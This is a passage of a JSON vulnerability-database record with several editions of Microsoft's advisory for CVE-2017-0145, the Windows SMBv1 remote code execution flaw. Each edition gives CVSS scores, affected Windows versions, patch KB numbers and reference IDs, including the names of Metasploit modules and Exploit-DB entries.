Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:55:45", "differentElements": ["msAffectedSoftware"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T14:46:24", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T14:46:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T14:46:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012215", "KB4012217", "KB4014077", "KB4012606", "KB4012216", "KB4013429", "KBMS16-110, 3187754", "KB4012214", "KB4012213", "KB3210721", "KB3205401", "KB4012598", "KB3210720", "KB3213986", "KB3205409", "KB3212646", "KB4013198", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:46:24", "differentElements": ["msAffectedSoftware"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T16:51:19", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T16:51:19", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T16:51:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3205409", "KB3213986", "KB4013429", "KB4012213", "KB4012606", "KB4012215", "KBMS16-110, 3187754", "KB4012216", "KB4012212", "KB3210720", "KB3212646", "KB4012214", "KB3177186", "KB4014077", "KB3210721", "KB4012217", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based 